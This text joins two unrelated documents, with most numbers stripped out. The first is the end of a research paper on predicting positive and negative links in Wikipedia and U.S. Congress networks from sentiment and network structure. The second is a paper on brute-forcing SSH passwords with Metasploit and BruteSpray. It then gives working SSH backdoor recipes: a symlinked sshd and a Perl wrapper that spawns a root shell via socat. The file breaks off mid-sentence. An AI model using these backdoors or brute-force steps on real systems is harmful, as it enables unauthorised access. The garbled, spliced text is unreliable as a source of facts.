d(z) f (xt,z) ( ) as a convex surrogate for d. our overall optimization problem is then the following relaxation of eq. : x∗ = arg min x∈[ , ]|e| ∑ e∈e c̃(xe, pe)+ ∑ t∈t d̃(xt). ( ) this objective has the exact form of an hl-mrf, since it is a weighted sum of hinge losses of lin- ear functions of x. we use the probabilistic soft logic package to perform the optimization, which is in turn based on the alternating-direction method of multipliers (admm) (boyd et al., ). learning. clearly, a solution is only useful if the cost parameters (λ , λ , and d(z) for all z ∈{ , } ) are set appropriately. one option would be to set the values heuristically, based on the predictions made by the social balance and status theories (sec. . ). however, it is more principled to learn these param- eters from data. for this purpose, we leverage the learning procedures included in the hl-mrf imple- mentation we employ, which uses the voted-percep- tron algorithm to perform maximum-likelihood esti- mation (bach et al., ). since our data points (edges) interact with each other via the network, some words on how we per- form training and testing are in order. fig. shows two options for obtaining training and testing sets (we use both options in our experiments). in the ‘random sampling’ paradigm, we randomly choose a set of edges for training (blue), and a disjoint set of edges for testing (yellow). in ‘bfs sampling’, we http://psl.umiacs.umd.edu run a breadth-first search from seed node u to obtain a coherent training set (blue), and likewise from a seed node v to obtain a coherent testing set (yellow), taking care that no edges from the training set are also included in the testing set. during both training and testing, an arbitrary por- tion of the edge signs may be fixed to observed val- ues and need not be inferred. these are the solid edges in fig. ; we refer to them as evidence. fur- ther, we define the evidence ratio as the number of evidence edges, divided by the number of all edges considered (solid and dashed). the learning algorithm may use the structure (v and e) of the training graph induced by all blue edges (solid and dashed), the predictions pe of the sentiment model for all blue edges, and the signs of the solid blue edges to predict the dashed blue edges. during testing, the network structure of all yel- low edges, the sentiment predictions for all yellow edges, and the signs of the solid yellow edges may be used to predict the dashed yellow edge signs. in principle, all training edges could be used as extra evidence for testing (i.e., all blue edges may be made solid yellow). however, in our experiments, we keep the training and testing sets fully disjoint. technical details. for clarity, we give further de- tails. first, the distribution of positive and negative signs may be skewed; e.g., we observe a prior prob- ability of % positive signs in our wikipedia cor- pus (sec. ). therefore, as also done by bach et al. ( ), we add a cost term to our objective (eq. ) that penalizes deviations from this prior probabil- ity (as estimated on the training set). this ensures that the model can default to a reasonable prediction for edges that are not embedded in any triangles and about which the sentiment model is uncertain. second, intuitively, we should not penalize devi- ating from the sentiment model when it is itself un- certain about its prediction (i.e., when pe is far from both and ). rather, we want to rely more heavily on signals from the network structure in such cases. to achieve this, we introduce pairs of cost param- eters (λ( ) ,λ ( ) ),...,(λ ( ) ,λ ( ) ). then, we divide the interval [ , ] into bins, and when pe falls into the i-th bin, we use λ(i) and λ (i) in eq. . this way, larger costs can be learned for the extreme bins close to and than for the intermediate bins around . . finally, hinge-loss terms may optionally be squared in hl-mrfs. we use the squared hinge loss in eq. , since initial experimentation showed this to perform slightly better than the linear hinge loss. wikipedia experiments our first set of experiments is conducted on the wi- kipedia requests for adminship corpus, which al- lows us to evaluate our model’s ability to predict person-to-person evaluations in web texts that are informal but pertain to important social outcomes. . dataset description for a wikipedia editor to become an administrator, a request for adminship (rfa) must be submitted, either by the candidate or by another community member. subsequently, any wikipedia member may cast a supporting, neutral, or opposing vote. this induces a directed, signed network in which nodes represent wikipedia members and edges represent votes (we discard neutral votes). we crawled and parsed all votes since the adop- tion of the rfa process in through may . this signed network was previously analyzed by leskovec et al. ( b; a). however, there is also a rich textual component that has so far re- mained untapped for edge-sign prediction: each vote is typically accompanied by a short comment (me- dian/mean: / tokens). a typical positive com- ment reads, ‘i’ve no concerns, will make an excel- lent addition to the admin corps’, while an example of a negative comment is, ‘little evidence of collab- oration with other editors and limited content cre- ation.’ the presence of a voting network alongside textual edge features makes our method of sec. well-suited for this dataset. the rfa network contains k nodes, k edges ( % positive), and close to m triangles. . experimental setup train/test sets. we follow the train–test paradigm termed ‘bfs sampling’ in sec. . and fig. , choos- ing random seed nodes, from each of which we perform a breadth-first search (following both in- and out-links) until we have visited nodes. we http://en.wikipedia.org/wiki/wikipedia:rfa data available online (west, ). thus obtain subgraphs with nodes each. we train a model for each subgraph i and test it on sub- graph i + (mod ), ensuring that edges from the training graph are removed from the testing graph. the bfs sampling paradigm was used because the alternative (‘random sampling’ in fig. ) pro- duces subgraphs with mostly isolated edges and only a few triangles—an unrealistic scenario. evaluated models. we evaluate three models: . a standard, text-based sentiment model that treats edges as independent data points; . our full model as specified in sec. . , which combines edge costs based on the predictions of the text-based sentiment model with triangle costs capturing network context; . a version of our model that considers only trian- gle costs, while ignoring the predictions of the text-based sentiment model (akin to the model proposed by bach et al. ( )). we refer to these models as ‘sentiment’, ‘combined’, and ‘network’, respectively. sentiment model. our text-based sentiment model is an l -regularized logistic-regression classifier whose features are term frequencies of the , overall most frequent words. the l -penalty is cho- sen via cross-validation on the training set. since comments often explicitly contain the label (‘sup- port’ or ‘oppose’), we remove all words with pre- fixes ‘support’ or ‘oppos’. we train the model only once, on a random sample of , comments drawn from the set of all k comments (the vast majority of which will not appear in our subgraphs). evidence ratio. regarding the other two models, recall from sec. . our definition of the evidence ratio, the fraction of edge signs that are fixed as evi- dence and need not be inferred. in our experiments, we explore the impact of the evidence ratio during training and testing, since we expect performance to increase as more evidence is available. (we use the same evidence ratio for training and testing, but this need not necessarily be so.) metrics. as our principal evaluation metrics, we use the areas under the curve (auc) of the receiver operating characteristic (roc) curve as well as the precision–recall (pr) curves. there are two pr ● ● ● ● evidence ratio a re a u n d e r th e c u rv e . % % % % . . . . . . ● ● ● ● ● ● ● ● (a) auc/roc ● ● ● ● evidence ratio . % % % % . . . . . ● ● ● ● ● ● ● ● combined sentiment network random (b) auc/negpr figure : auc as function of evidence ratio (wikipedia), with standard errors. curves, one for the positive class, the other for the negative one. of these two, the positive class is less interesting: due to the class imbalance of % posi- tive edges, even a random guesser would achieve an auc of . . the pr curve of the negative class is more informative: here, it is much harder to achieve high auc, since random guessing yields only . . moreover, the negative edges are arguably more im- portant, not only because they are rarer, but also be- cause they indicate tensions in the network, which we might be interested in detecting and resolving. for these reasons, we report only the auc under the negative pr curve (auc/negpr) here. additionally, we report the area under the roc curve (auc/roc), a standard metric for quantify- ing classification performance on unbalanced data. it captures the probability of a random positive test example receiving a higher score than a random neg- ative one (so guessing gives an auc/roc of . ). . results performance as a function of evidence ratio. the aucs as functions of the evidence ratio are shown in fig. (a). (we emphasize that these plots are not themselves roc and pr curves; rather, they are de- rived from those curves by measuring auc for a range of models, parametrized by evidence ratio.) since we use the same sentiment model in all cases (sec. . ), its performance (yellow) does not depend on the evidence ratio. it is remarkably high, at an auc/roc of . , as a consequence of the highly indicative, sometimes even formulaic, lan- guage used in the comments (examples in sec. . ). the network-only model (blue) works poorly on very little evidence (auc/roc . for . % ev- ● ● ● ● ● ● ● number of dropped features a re a u n d e r th e c u rv e . . . . . . ● ● ● ● ● ● ● ● ● ● ● ● ● ● (a) auc/roc ● ● ● ● ● ● ● number of dropped features . . . . . ● ● ● ● ● ● ● ● ● ● ● ● ● ● combined sentiment network random (b) auc/negpr figure : auc as function of number of dropped features (wikipedia), with standard errors. evidence ratio %. idence) but improves steadily as more evidence is used (auc/roc . for % evidence): this is in- tuitive, since more evidence means stronger context for each edge sign to be predicted. although the network-only model works poorly on little evidence, our full model (black), which syn- thesizes the sentiment and network models, is not af- fected by this and effectively defaults to the behavior of the sentiment-only model. furthermore, although the network-only model never attains the perfor- mance of the sentiment-only model, combining the two in our full model (black) nonetheless yields a small performance boost in terms of auc/roc to . for % evidence. the gains are signifi- cantly larger when we consider auc/negpr instead of auc/roc: while the sentiment model achieves . , the combined model improves on this by %, to . , at % evidence ratio. performance as a function of sentiment-model quality. it seems hard to improve by much on a sen- timent model that achieves an auc/roc of . on its own; the wikipedia corpus offers an exception- ally explicit linguistic signal. hence, in our next ex- periment, we explore systematically how our model behaves under a less powerful sentiment model. first, we measure, for each feature (i.e., word), how informative it is on its own for predicting the signs of edges (quantified by its mutual information with the edge sign), which induces a ranking of fea- tures in terms of informativeness. now, to make the sentiment model less powerful in a controlled way, we drop the top m features and repeat the experiment described above for a range of m values (where we keep the evidence ratio fixed at %). ● ● ● ● ● ● ● ● ● ● e − e − e + sentiment−model prediction pe n o rm . co st f o r d e vi a tin g f ro m p e . . . . . . . . . . figure : normalized cost λ(i) (defined in sec. . ; log- arithmic scale) for deviating from sentiment-model pre- dictions pe, for bins i = ,..., (wikipedia). upper bin boundaries on the x-axis. values shown are averages over folds. evidence ratio %. fig. shows that the performance of the senti- ment model (yellow) declines drastically as more features are removed. the combined model (black), on the contrary, is much less affected: when the per- formance of the sentiment model drops to that of the network-only (blue; roc/auc . ), the combined model is still stronger than both ( . ). even as the sentiment model approaches random performance, the combined model still never drops below the net- work-only model—it simply learns to disregard the predictions of the sentiment model altogether. learned edge costs. recall from the final part of sec. . that each output pe of the sentiment model falls into one of bins [ , . ],...,[ . , ], with separate edge-cost parameters λ(i) and λ (i) learned for each bucket i. the rationale was to give the model the freedom to trade off edge and triangle costs differently for each edge e, depending on how informative the sentiment model’s prediction pe is. the goal of this section is to understand whether our model indeed exposes such behavior. recall from eq. that λ is the constant with which the ab- solute difference between pe and the inferred edge sign xe is multiplied when xe > pe, while λ is the constant when xe < pe. if pe falls into bin i, the sum λ (i) +λ (i) expresses the cost of deviating from pe in a single number; further, dividing this sum by the sum of all costs (i.e., λ(i) and λ (i) for all bins i, plus the costs d(z) of all triangle types z) yields a normalized edge cost for each bin i, which we call λ(i). fig. plots λ(i) for all bins i = ,..., . we ob- serve that deviating from the sentiment model costs more when it makes a strong prediction (i.e., pe s e n t. l o o l o o + s e n t. . . . . . . random (a) auc/roc s e n t. l o o l o o + s e n t. . . . . . . random (b) auc/negpr figure : performance in a leave-one-out (loo) scenario (wikipedia), with standard errors. for comparison: per- formance of the sentiment model alone. close to or ) than when it makes a non-informa- tive one (e.g., pe ≈ . ). when pe ≈ , nearly % of the total cost is spent to ensure xe ≈ pe, whereas that fraction is only around . % when pe ≈ . . leave-one-out setting. our model predicts many missing edge signs simultaneously, using joint infer- ence. another scenario was proposed by leskovec et al. ( a), who predict signs one at a time, as- suming all other edge signs are known. we call this a leave-one-out (‘loo’ for short) setting. assume we want to predict the sign of the edge (u,v) in the loo setting, and that u, v, and w form a triangle. the type of this triangle can be described by the direc- tions and known polarities of the two edges linking u to w, and v to w, respectively. the edge (u,v) may be embedded in several triangles, and the histogram over their types then serves as the feature vector of (u,v) in a logistic regression; as additional features, counts of u’s positive/negative out-links and v’s pos- itive/negative in-links are used. since predictions in the loo setup can draw on the full triangle neighborhood of the edge in ques- tion, we expect it to perform better than the net- work-only model in which edge signs in the triangle neighborhood are often missing. this expectation is confirmed by fig. , which shows that the loo model (gray) achieves an auc/roc (auc/negpr) of . ( . ), with the network-only model (fig. ) at just . ( . ) at % evidence ratio. however, loo is outperformed by our combined model incorporating sentiment information (fig. ), which attains an auc/roc (auc/negpr) of . ( . ). finally, when we add the sentiment predic- tion as another feature to the loo model (‘loo + sent.’ in fig. ), we do best, at . ( . ). to summarize, we make two points: ( ) by com- bining sentiment and network features, our model achieves better performance than a network-only model (loo) that has access to significantly more network information. ( ) incorporating sentiment information helps not only in our setup as described in sec. . , but also in the previously proposed leave-one-out setup (leskovec et al., a). u.s. congress experiments we now evaluate our model in a setting in which the linguistic person-to-person evaluations are less direct and reliable than in the rfa corpus but the signed network is considerably denser. . dataset description the ‘convote’ corpus of congressional speeches (thomas et al., ) consists of , speech seg- ments drawn from debates from the u.s. house of representatives in . there is a mean of . speech segments per debate and . speakers per debate. segments are annotated with the speaker, their party affiliation, the bill discussed, and how the speaker voted on that bill (positive or negative). thomas et al. ( ) and others represent this cor- pus as a bipartite person–item graph with signed edges from congresspeople to the bills (items) they spoke about, and they add additional person–person edges encoding who mentioned whom in the speech segments. we take a different perspective, extract- ing from it a dense, undirected person–person graph by linking two congresspeople if they ever voted on the same bill, labeling the edge as positive if they cast the same vote at least half of the time. we di- rectly use the sentiment model trained by thomas et al. the resulting graph has nodes, , edges ( % positive), and , triangles. . experimental setup we split the network g = (v,e) into folds us- ing the ‘random sampling’ technique described in sec. . and fig. : the set of nodes v is fixed across all folds, and the set of edges e is partitioned ran- domly so that each fold has % of all edges. in the full graph, there is one clique per debate, so each fold contains the overlay of several subgraphs, one per debate and each % complete on average. here, random sampling was used because the al- ternative (‘bfs sampling’ in fig. ) would produce nearly complete subgraphs, on which we found the prediction task to be overly easy (since the problem becomes more constrained; sec. . ). we compare the three models also used on the wikipedia dataset (sec. . ). our sentiment model comes right out of the box with the convote cor- pus: thomas et al. ( ) distribute the text-level scores from their svm classifier with the corpus, so we simply work with those, after transforming them into probabilities via logistic regression (a standard technique called platt scaling (platt, )). thus, let qu and qv be the probabilistic sentiment predic- tions for u and v on a given bill. the probability that u and v agree on the bill is quqv + ( −qu)( −qv), and we define the probability pe of a positive sign on the edge e ={u,v} as the average agreement proba- bility over all bills that u and v co-voted on. for instance, the speech containing the sentence, ‘mr. speaker, i do rise today in strong support of h.r. ,’ receives a probability of % of express- ing a positive opinion on h.r. (i.e., house of rep- resentatives) bill , whereas the prediction for the speech containing the words, ‘therefore, i urge my colleagues to vote against both h.r. and h.r. ,’ is only %. hence, the edge between the two respective speakers has a probability of %× %+ %× % = % of being positive. . results fig. summarizes our results. as in the wikipedia experiments, we report aucs as a function of the evidence ratio. the sentiment model alone (yellow) achieves an auc/roc (auc/negpr) of . ( . ), well above the random baselines at . ( . ). the network-only model (blue) performs much worse at the start, but it surpasses the sentiment model even with just . % of the edges as evidence, a reflection of the dense, high-quality network structure with many triangles. when we combine the sentiment and network models (black), we consistently see the best results, with the largest gains in the realistic sce- nario where there is little evidence. eventually, the network-only model catches up to the combined model, simply because it reaches an upper bound on performance given available evi- dence. this owes mainly to the fact that, because we ● ● ● ● ● ● evidence ratio a re a u n d e r th e c u rv e % % . % % % % . . . . . . ● ● ● ● ● ● ● ● ● ● ● ● (a) auc/roc ● ● ● ● ● ● evidence ratio % % . % % % % . . . . . . . ● ● ● ● ● ● ● ● ● ● ● ● combined sentiment network random (b) auc/negpr figure : auc as function of evidence ratio (convote), with standard errors. derived the person–person signs from person–item signs, only triangles with an even number of nega- tive edges arise with noticeable frequency. to see why, suppose the corpus contained speeches about just one bill. in a triangle consisting of nodes u, v, and w, if u agreed with v and with w, then v and w must agree as well. (the fact that we have multi- ple bills in the corpus opens up the possibility for additional triangle types, but they rarely arise in the data.) this constrains the solution space and makes the problem easier than in the case of wikipedia, where all triangle types are possible. our plots so far have summarized precision–recall curves by measuring auc. here, it is also informa- tive to inspect a concrete pr curve, as in fig. , which shows all the values at % evidence ratio. the network-only model (blue) achieves very high precision up to a recall of about . , where there is a sudden drop. the reason is that, according to the above argument about possible triangle types, the model can be very certain about some edges (e.g., because it is the only non-evidence edge in a tri- angle, making only a single triangle type possible), which causes the plateau for low recall. the com- bined model matches the precision on the plateau, but also maintains significantly higher precision as the network-only model starts to do more poorly: even if an edge e is not fully determined by sur- rounding evidence, the sentiment model might still give strong signals for e itself and its neighbors, such that the above reasoning effectively still applies. discussion we developed a model that synthesizes textual and social-network information to jointly predict the po- (a) positive signs (b) negative signs figure : precision/recall (convote, evidence ratio %). larity of person-to-person evaluations, and we as- sessed this model in two datasets. both involve com- munal decision making, where people’s attitudes and opinions of each other have profound social con- sequences, but they are very different. in the wi- kipedia corpus, the sentiment signal is strong be- cause of established community norms for how to convey one’s opinions, but the network is sparse. in the convote corpus, the network is determined by fully observed voting patterns, making it strong, but the speech texts themselves only indirectly and nois- ily convey person-to-person opinions. in both cases, our method excels because it is adaptive: it learns from the data how best to combine the two signals. our model’s adaptivity is important for real-world applications, where one is unlikely to know ahead of time which signals are most trustworthy. we envi- sion the following use-case. one extracts a coherent subgraph of the network of interest, perhaps using one of our sampling methods (fig. ) and annotates its edges for their evaluativity. then, in conjunc- tion with a sentiment model (out-of-the-box or spe- cially trained), one trains our combined model and uses it to predict new edge labels in the network. in this setting, the sentiment model might be unreli- able, and one might have the time and resources to label only a small fraction of the edges. individually, the network and sentiment models would likely per- form poorly; in bringing the two together, our single model of joint inference could still excel. acknowledgements. this research has been sup- ported in part by nsf iis- , cns- , iis- , iis- ; aro muri; darpa smisc, graphs; onr n - - - ; paypal; docomo; and volkswagen. robert west has been supported by a facebook and a stanford graduate fellowship. edge costs: – + two-level spin glass triangle balance v* figure : reduction from two-level spin glass to triangle balance. a proof sketch of theorem due to space constraints, we only give a proof sketch here; the full proof is available online (west, ). proof sketch. by reduction from two-level spin glass (tlsg), a problem known to be np-hard (barahona, ). an instance of tlsg consists of vertices v arranged in two d grids, one stacked above the other, with edges e between nearest neighbors, and with an edge cost cuv ∈{− , ,+ } associated with each edge {u,v} (see fig. for a small instance). given such an instance, tlsg asks for vertex signs x ∈ {− ,+ }|v| that mini- mize the total energy h(x) = − ∑ {u,v}∈e cuv xu xv. the crucial observation is that tlsg defines ver- tex costs (implicitly all-zero) and edge costs, and asks for vertex signs, whereas triangle balance defines edge costs and triangle costs, and asks for edge signs. that is, vertices (edges) in tlsg corre- spond to edges (triangles) in triangle balance, and our proposed reduction transforms an original tlsg instance into a triangle balance instance in which each edge corresponds to exactly one orig- inal vertex, and each triangle to exactly one original edge. as shown in fig. , which depicts the reduc- tion schematically, this is achieved by introducing a new vertex v∗ that is connected to each original ver- tex and thus creates a triangle for each original edge. the full proof (west, ) shows how the edge and triangle costs can be constructed such that each op- timal solution to the tlsg instance corresponds to an optimal solution to the triangle balance in- stance, and vice versa. references rakesh agrawal, sridhar rajagopalan, ramakrishnan srikant, and yirong xu. . mining newsgroups using networks arising from social behavior. in proceedings of the th international conference on world wide web. pranav anand, marilyn walker, rob abbott, jean e. fox tree, robeson bowmani, and michael minor. . cats rule and dogs drool! classifying stance in online debate. in proceedings of the nd workshop on computational approaches to subjectivity and sen- timent analysis. stephen bach, bert huang, ben london, and lise getoor. . hinge-loss markov random fields: convex inference for structured prediction. in pro- ceedings of the th conference on uncertainty in ar- tificial intelligence. francisco barahona. . on the computational com- plexity of ising spin glass models. journal of physics a: mathematical and general, ( ): – . john blitzer, mark dredze, and fernando pereira. . biographies, bollywood, boom-boxes and blenders: domain adaptation for sentiment classification. in proceedings of the th annual meeting of the associ- ation of computational linguistics. stephen boyd, neal parikh, eric chu, borja peleato, and jonathan eckstein. . distributed optimiza- tion and statistical learning via the alternating direc- tion method of multipliers. foundations and trends in machine learning, ( ): – . matthias broecheler, lilyana mihalkova, and lise getoor. . probabilistic similarity logic. in pro- ceedings of the th conference on uncertainty in ar- tificial intelligence. dorwin cartwright and frank harary. . structure balance: a generalization of heider’s theory. psycho- logical review, ( ): – . robin i. dunbar. . gossip in evolutionary perspec- tive. review of general psychology, ( ): – . lisa feldman barrett and james a. russell. . independence and bipolarity in the structure of af- fect. journal of personality and social psychology, ( ): – . fritz heider. . attitudes and cognitive organization. the journal of psychology, ( ): – . xia hu, lei tang, jiliang tang, and huan liu. . ex- ploiting social relations for sentiment analysis in mi- croblogging. in proceedings of the th acm interna- tional conference on web search and data mining. bert huang, angelika kimmig, lise getoor, and jennifer golbeck. . a flexible framework for probabilis- tic models of social trust. in proceedings of the international social computing, behavioral-cultural modeling and prediction conference. dan jurafsky, victor chahuneau, bryan r. routledge, and noah a. smith. . narrative framing of con- sumer sentiment in online restaurant reviews. first monday, ( – ). daphne koller and nir friedman. . probabilistic graphical models: principles and techniques. mit press. jérôme kunegis, julia preusse, and felix schwagereit. . what is the added value of negative links in online social networks? in proceedings of the nd international conference on world wide web. jure leskovec, daniel huttenlocher, and jon kleinberg. a. predicting positive and negative links in online social networks. in proceedings of the th interna- tional conference on world wide web. jure leskovec, daniel huttenlocher, and jon kleinberg. b. signed networks in social media. in proceed- ings of the sigchi conference on human factors in computing systems. wei-hao lin, theresa wilson, janyce wiebe, and alexander hauptmann. . which side are you on? identifying perspectives at the document and sentence levels. in proceedings of the th conference on com- putational natural language learning. hao ma, dengyong zhou, chao liu, michael r lyu, and irwin king. . recommender systems with social regularization. in proceedings of the th acm inter- national conference on web search and data mining. robert malouf and tony mullen. . taking sides: user classification for informal online political dis- course. internet research, ( ): – . bo pang and lillian lee. . a sentimental education: sentiment analysis using subjectivity summarization based on minimum cuts. in proceedings of the nd annual meeting of the association for computational linguistics. bo pang and lillian lee. . opinion mining and sentiment analysis. foundations and trends in infor- mation retrieval, ( ): – . john platt. . probabilistic outputs for support vec- tor machines and comparisons to regularized likeli- hood methods. advances in large margin classifiers, ( ): – . marta recasens, cristian danescu-niculescu-mizil, and dan jurafsky. . linguistic models for analyzing and detecting biased language. in proceedings of the st annual meeting of the association for computa- tional linguistics. david c. rubin and jennifer m. talerico. . a com- parison of dimensional models of emotion. memory, ( ): – . james a. russell. . a circumplex model of af- fect. journal of personality and social psychology, ( ): – . swapna somasundaran and janyce wiebe. . recog- nizing stances in ideological on-line debates. in pro- ceedings of the naacl hlt workshop on com- putational approaches to analysis and generation of emotion in text. chenhao tan, lillian lee, jie tang, long jiang, ming zhou, and ping li. . user-level sentiment anal- ysis incorporating social networks. in proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. jiliang tang, huiji gao, xia hu, and huan liu. . exploiting homophily effect for trust prediction. in proceedings of the th acm international conference on web search and data mining. matt thomas, bo pang, and lillian lee. . get out the vote: determining support or opposition from congressional floor-debate transcripts. in proceed- ings of the conference on empirical methods in natural language processing. robert west. . supplementary material. online. http://infolab.stanford.edu/∼west /tacl /. theresa wilson, janyce wiebe, and paul hoffmann. . recognizing contextual polarity in phrase-level sentiment analysis. in proceedings of human lan- guage technology conference and conference on em- pirical methods in natural language processing. tae yano, philip resnik, and noah a. smith. . shedding (a thousand points of) light on biased lan- guage. in proceedings of the naacl-hlt workshop on creating speech and language data with ama- zon’s mechanical turk. bei yu, stefan kaufmann, and daniel diermeier. . classifying party affiliation from political speech. journal of information technology and pol- itics, ( ): – . paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , violence cracking technology of ssh service based on kali-linux ma limei college of information technology hebei normal university shijiazhuang, in china key laboratory of network and information security in hebei province shijiazhuang, in china school of information studies, dominican university, river forest, in usa e-mail: malimei@hebtu.edu.cn zhao dongmei* college of information technology hebei normal university shijiazhuang, in china key laboratory of network and information security in hebei province shijiazhuang, in china e-mail: @qq.com gao yijun school of information studies dominican university river forest, in usa e-mail: ygao@dom.edu zhao chen college of information technology hebei normal university shijiazhuang, in china key laboratory of network and information security in hebei province shijiazhuang , in china e-mail: tczxz @ .com abstract—in this paper, the current popular ssh password brute force cracking tool is researched, analyzed and summarized. the ssh_login module in metasploit is used to brute force the ssh service to finally obtain the password. the brute spray tool is used to automatically call medusa to blast the service, demonstrating ssh. the process of brute force cracking has certain reference value for penetration attack testing and security defense. keywords-component; violence cracking; technology; ssh service; kali-linux all ssh is an acronym for secure shell, developed by the ietf's network working group, ssh is a security protocol based on the application layer and transport layer. ssh is a protocol that provides security for remote login sessions and other network services. the ssh protocol can effectively prevent information leakage during remote management. ssh was originally a program on a unix system and later quickly expanded to other operating platforms. ssh can make up for vulnerabilities in the network when it is used correctly. the ssh client is available on multiple platforms. ssh can be run on almost all unix platforms—including hp-unix, linux, aix, solaris, digital unix, and others. the kali linux penetration test platform defaults to the ssh service. ssh for remote server management, you only need to know the server's ip address, port, management account and password, you can manage the server, network security follows the principle of wooden barrel, as long as you open a hole through ssh, this will be for infiltrators it is a new world. i. ssh provides two authentication methods. the first is a key-based security verification that relies on a key, which means you have to create a pair of keys for yourself and put the public key on the server you need to access. if you are connecting to an ssh server, the client software will make a request to the server for security verification with your key. after the server receives the request, look for your public key in your home directory on the server and compare it to the public key you sent. if the two keys match, the server encrypts the "challenge" with the public key and sends it to the client software. after the client software receives the "challenge", it can decrypt it with your private key and send it to the server. doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , the second is password-based security verification, as long as you know your account and password, you can log in to the remote host. all transmitted data will be encrypted, but there is no guarantee that the server you are connecting to is the one you want to connect to. there may be other servers that impersonate the real server, which is attacked by the "middleman". at the same time, if the server has no other security restrictions, such as login source ip, account login error times, there may be violent cracking. however, ssh is not absolutely secure. if you do not restrict the login source ip and do not set the number of attempts to log in, it will be cracked. ii. ssh password brute force application and thoughts a. application  the root permission is obtained through remote command execution such as structs.  get root privileges through web shell authorization  through the local file contains the vulnerability, you can read all the files locally in linux.  obtain the network access authority, which can access the intranet computer.  the ssh port is enabled on the external network (the default or modified port), and ssh access is available. in the previous scenarios, you can get the shadow file and brute force it to get the password of these accounts, but in other scenarios, no loopholes are available. at this time, you need to brute the ssh account. b. thoughts  brute force the root account  use admin as the username to brute force  use the admin dictionary for password cracking  using mastery information to organize social worker information and generate dictionary brute force cracking  comprehensive utilization and recycling of information iii. the specific steps are as follows: a. purpose master the process of brute-breaking the ssh service through the ssh login module in metasploit to finally obtain the password. b. software used guest operating system: kali-linux . , ip address is . . . . server operating system: centos . , address . . . . tool software: metasploit, nmap. c. steps ) load the kali-linux virtual machine, open the kali system terminal, and use nmap to scan the target . . . port. the command is as follows: nmap - v -a -pn . . . , found that open ports, you can try to brute force. the result is shown in figure . figure . nmap scan results parameter description: -v: enable verbose mode; -a: detect the target operating system; -pn: do not ping the target host to reduce the probability of being discovered or blocked by the guard device. ) open another new command line window, type ssh admin@ . . . , enter the password arbitrarily, and the access is blocked. try this process multiple times ( times or more) and find that you can still try to enter the password, the user will not be locked, as shown in figure , so all the conditions that satisfy the brute force vulnerability can be brute force cracked. international journal of advanced network, monitoring and controls volume , no. , figure . trying to log in ) use the ssh_login module in metasploit to crack the crack, open the kali system terminal, and enter msfconsole, as shown in figure . figure . start metasploit ) enter search ssh_login and search for the ssh_login module, as shown in figure . figure . searching for the ssh_login module ) enter use auxiliary/scanner/ssh/ssh_login to load the ssh_login module, as shown in figure . figure . loading the ssh_login module ) enter show options to display the ssh_login module parameters, as shown in figure . figure . ssh_login module parameters explanation of important parameters: rhost: the target host ip address; pass_file: brute force password dictionary storage path; username: specify the username used for brute force attack; stop_on_sucess: set to stop brute force attack immediately after cracking the password. ) set the relevant parameters of the brute force target host, as shown in figure . figure . set the parameters ) enter the exploit to start brute force cracking, and successfully obtain the password, which is admin , as shown in figure . figure . execution attack ) open the terminal, enter ssh admin@ . . . , and enter the cracked password to log in to the server, as shown in figure . figure . successful login to the server ) enter the command to view server related information, as shown in figure . figure . execution system command international journal of advanced network, monitoring and controls volume , no. , iv. use brutespray to violently crack ssh password brutespray is a gnmap/xml file based on nmap scanning output. it calls medusa automatically to explode the service faster than hydra. ibrutespray calls medusa, which claims to support violent account cracking of ssh, ftp, telnet, vnc, mssql, mysql, postgresql, rsh, imap, nntp, pcanywhere, pop , rexec, rlogin, smbnt, smtp, svn and vmauthd protocols. a. installation under kali brutespray is not integrated into kali linux by default. it needs to be installed manually. some need to perform updates in kali first, and apt-get update before executing the installation command: apt-get install brutespray kali linux installs its user and password dictionary file location by default: / usr / share / brutespray / wordlist. b. manual installation git clone https://github.com/x skysn k/brutespray.git cd brutes pray pip install-r requirements.txt note that if medusa needs to be installed in other environments, otherwise an error will be executed. c. brutes pray using parameters usage: brutespray.py[-h]-f file [-o output] [-s service] [-t threads] [-t hosts] [-u userlist] [-p passlist] [-u username] [-p password] [-c] [-i] usage: python brutespray.py < options > option parameters: -h, --help displays help information and exits menu options: -f file, -- file file parameter followed by a file name, parses the gnmap or xml file output from nmap -o output, -- output output contains the directory of successful attempts -s service, --service service parameter followed by a service name specifies the service to be attacked -t threads, --threads threads parameter followed by a value specifying the number of medusa threads -t hosts, - - hosts hosts parameter followed by a value specifying the number of hosts tested at the same time -u userlist, --userlist userlist parameter followed by user dictionary file -p passlist - -- passlist passlist parameter followed by password dictionary file -u username, -- username username parameter followed by user name, specify a user name for blasting -p password, --password password parameter followed by password, specify a password for blasting - c.-- continuous blasting after success - i --interactive interaction mode v. violent cracking of ssh passwords ) interactive mode cracking python brutespray. py -- file nmap. xml - i after execution, the program automatically identifies the services in the nmap scanning results, chooses the services that need to be cracked according to the prompt, the number of threads, the number of hosts that are simultaneously violently cracked, specifies the user and password files, and brutespray will display the “success” information on the screen after successful cracking. vi. ssh backdoor a. soft connected backdoor ln-sf /usr/sbin/sshd/tmp/su; /tmp/su-oport= ; the classical backdoor uses ssh root@x.x.x-p to establish a soft connection to sshd directly, and then login with any password.but this is very weak, and protection scripts like rookit hunter can be scanned. b. ssh server wrapper back door ) copy sshd to bin directory cd /usr/sbin mv sshd. / bin ) editing sshd vi sshd // add the following and save #!/usr /bin/perl exec "/ bin / sh" if (get peername (stdin) = ~/^.. lf/); exec {"/usr/bin/sshd"}"/ usr/sbin/sshd", @argv; ) right to modify chmod sshd ) using socat international journal of advanced network, monitoring and controls volume , no. , socat stdio tcp : target_ip: , sourceport = if socat is not installed, it needs to be installed and compiled wget http://www.dest- unreach.org/socat/download/socat- . . . .tar.gz tar-zxvf socat- . . . .tar.gz cd socat- . . . ./configure make make install ) password-free login using ssh root@ target_ip vii. ssh public key cryptography the local computer generates the public and private keys, copies the public key files to the ~/.ssh/authorized_keys files on the servers that need to be connected, and sets the corresponding permissions to log on to the server without password. chmod ~/.ssh/authorized_keys viii. conclusion by comparing the ssh brute force tests of the tools hydra, medusa, patator, brutepray and metasploit, the summary is as follows: ) each software can successfully crack the ssh account and password. ) patator and brute spray are written in python, but brutepray requires medusa support. ) hydra and medusa are written in c and need to be compiled. ) brutepray based on the results of nmap scan for brute force cracking, brute force effect after scanning the intranet. ) patator is based on python, fast, and compatible. it can be used in windows or linux. ) if you have kali conditions or pentestbox, it is not bad to use metasploit for ssh brute force cracking. ) brutespray will automatically generate the crack success log file /brutespray-output/ssh-success.txt; hydra plus parameter "-o save.log" record successfully cracked to the log file save.log, medusa plus "-o ssh.log the parameter can record the successfully cracked record into the ssh.log file; the patator can add the parameter "-x 